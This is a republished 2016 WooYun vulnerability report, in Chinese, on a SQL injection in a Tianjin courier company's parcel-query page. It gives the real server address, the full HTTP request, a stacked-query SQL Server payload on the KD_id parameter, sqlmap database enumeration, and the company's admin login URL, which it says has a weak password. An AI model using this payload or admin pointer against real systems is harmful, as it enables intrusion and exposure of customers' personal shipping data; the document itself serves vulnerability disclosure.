天津飞康达速递服务有限公司某处sql注入可泄露至少十万快递信息,再附加后台弱口令一发

  • A+
所属分类:乌云漏洞
摘要

2016-03-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-28: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-184238

漏洞标题: 天津飞康达速递服务有限公司某处sql注入可泄露至少十万快递信息,再附加后台弱口令一发

相关厂商: 天津飞康达速递服务有限公司

漏洞作者: Adoubi

提交时间: 2016-03-14 15:46

公开时间: 2016-04-28 15:46

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: asp+sqlserver注射

0人收藏 收藏

分享漏洞:

天津飞康达速递服务有限公司某处sql注入可泄露至少十万快递信息,再附加后台弱口令一发


漏洞详情

披露状态:

2016-03-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

天津飞康达速递服务有限公司某处sql注入可泄露所有快递信息

详细说明:

问题出在他的快递查询页面 post注入

http://219.232.255.138:800/

抓个包。。

POST /chaxun.asp HTTP/1.1

Host: 219.232.255.138:800

Content-Length: 12

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://219.232.255.138:800

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://219.232.255.138:800/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASPSESSIONIDSSRBDCQT=NDJHCIBCNFFIBOIDDMKMLLIJ

KD_id=132q32

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: KD_id

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: KD_id=132q32'); WAITFOR DELAY '0:0:5';--

---

[15:58:10] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2008

web application technology: ASP.NET, Microsoft IIS 7.5, ASP

back-end DBMS: Microsoft SQL Server 2008

[15:58:10] [INFO] fetching database names

[15:58:10] [INFO] fetching number of databases

[15:58:10] [INFO] resumed: 7

[15:58:10] [INFO] resumed: master/n

[15:58:10] [INFO] resumed: model

[15:58:10] [INFO] resumed: msdb

[15:58:10] [INFO] resumed: ReportServer

[15:58:10] [INFO] resumed: ReportServerTempDB

[15:58:10] [INFO] resumed: tempdb

[15:58:10] [INFO] resumed: x10

available databases [7]:

[*] master

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

[*] x10

剩下的我就不继续注入了,能得到所有快递信息的哦,个人信息泄露绝对多哦

http://www.fkd.com.cn/admin/

另外附加后台弱口令一发

天津飞康达速递服务有限公司某处sql注入可泄露至少十万快递信息,再附加后台弱口令一发

漏洞证明:

RS

修复方案:

加过滤啊亲

版权声明:转载请注明来源 Adoubi@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin